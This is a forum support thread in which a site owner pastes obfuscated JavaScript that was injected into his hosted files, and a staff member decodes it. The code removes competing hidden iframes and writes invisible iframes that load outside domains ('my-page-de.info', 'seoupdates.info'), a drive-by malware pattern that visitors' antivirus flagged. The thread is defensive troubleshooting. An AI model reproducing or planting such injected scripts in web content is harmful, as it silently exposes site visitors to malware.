X10hosting is having virus? - Please help!

Status
Not open for further replies.
anhminh

anhminh

Member
Messages
110
Reaction score
0
Points
16
When i check my FTP account i have founded some script which is not create by me like this:


< script src = " http://analytics-google.info/urchin.js" ></ script >
I do not know what is this code come from (not from me,i never create anything about virus), but it make my computer and some computer of some member (like "tittat") who want to come to my website to help me have report "my website is having a virus, trojan").
Please answer or check server for me " where is it come from (from x10hosting automatic creating server or from some viruses?)
Edit:
Last month it had a shorter code but now it become longer:
I do not want it! please help me to remove it!


< s c ript type="text/javascript" src="http://x10hosting.com/adserve.js?aminh"></script>< s c ript >< s c ript >
<!--
var d=document;
eval( unescape( "%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%37%30%30%29%2b%27%64%63%5c%27%20%77%69%64%74%68%3d%37%36%20%68%65%69%67%68%74%3d%33%32%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
//-->
</Script>< s c ript >check_content()</script>< s c ript >eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%64%39%30%33%33%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%73%65%6f%75%70%64%61%74%65%73%2e%69%6e%66%6f%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%39%35%35%35%29%2b%27%39%31%38%36%34%5c%27%20%77%69%64%74%68%3d%32%34%37%20%68%65%69%67%68%74%3d%35%36%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
 
Last edited:
bugfinder

bugfinder

Retired
Messages
2,260
Reaction score
0
Points
0
If you dont want that code. Remove it.

the bit that says
<script type="text/javascript" src="http://x10hosting.com/adserve.js?aminh"></script> you need to leave, the rest, is not something we require, and we dont edit files for you so that leaves only a couple of ways it could be there.

1. its there because some code on your site (most likely as no one else should have permission to write to your files other than you, unless you set it 666) which through a loophole has allowed them to edit your code and place this in there for you

2. Someone with access to your account has placed it in there for you.

The code translates to:(you can test it for yourself by running it through urldecode on php)

<script>
function check_content(){ var i = 0;while(document.getElementsByTagName('iframe').length){var el = document.getElementsByTagName('iframe');if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1' ) {el.parentNode.removeChild(el);} else i++;}}
var c1439772935;
check_content();
if (!myia) { d.write('<IFRAME name=c1 src=\'http://my-page-de.info/in.cgi?2&'+Math.round(Math.random()*24700)+'dc\' width=76 height=325 style=\'display: none\'>
</script>

Which in effect makes an iframe and calls a new site.
 
anhminh

anhminh

Member
Messages
110
Reaction score
0
Points
16
Remove? No, it will automatically appear as a ghost! I cannot control that code.
 
anhminh

anhminh

Member
Messages
110
Reaction score
0
Points
16
Anyone give a solution? I bored with virus script which cannot remove like this.
 
bugfinder

bugfinder

Retired
Messages
2,260
Reaction score
0
Points
0
You can remove it, it wont appear as a "ghost" .. just delete the bit of code you posted..
 
Status
Not open for further replies.
Top